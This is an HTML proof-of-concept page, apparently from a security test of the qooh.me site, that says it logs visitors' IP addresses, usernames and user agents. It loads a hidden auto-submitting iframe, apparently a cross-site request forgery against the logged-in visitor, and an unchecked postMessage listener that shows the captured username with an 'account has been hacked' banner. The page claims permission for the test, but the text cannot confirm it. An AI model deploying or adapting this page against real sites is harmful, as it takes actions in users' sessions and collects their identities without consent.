<!doctype html>
<head>
    <title>Mobile qooh.me test page</title>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <style type=text/css>
        body {
            background:    #050505 url(/images/fox.png) no-repeat 1em 6em fixed;
            color:         #ccc;
            margin:        6em auto;
        }
        h1, #content {
            max-width:     40em;
            background:    rgba(4,4,4,0.8);
            box-shadow:    #ccc 0px 0px 2.6px 0px,
                           #000 0px 0px 13px 0px inset;
            border:        #ccc;
            margin:        0 auto;
        }
        h1, h2 {
            text-align:    center;
        }
        h1 {
            border-radius: 6px;
            padding:       1em;
        }
        #content {
            padding:       1em;
            margin-top:    3em;
        }
    </style>
<body>
    <h1>Why hello there ;)</h1>
    <div id="content">
        <h2>This isn't an attack</h2>
        <p>I have been granted permission to test qooh.me for vulnerabilities and
        this page is nothing but the proof.</p>
        <p>The following gets logged when you visit this page</p>
        <p><i>Ip address, username, address of the page you visited with the code
            running on qooh.me, your useragent.</i></p>
    </div>
    <script type=text/javascript>
        window.addEventListener("message", function (e) {
            document.querySelector("h1").textContent = e.data.indexOf("user/") == 0
               ? "Welcome guest! Your account has not been hacked!!"
               : "Welcome " + e.data + "! Your account has been hacked!!"
        })
    </script>
    <iframe src='find_friends_autosubmit.html' style="display:none"></iframe>
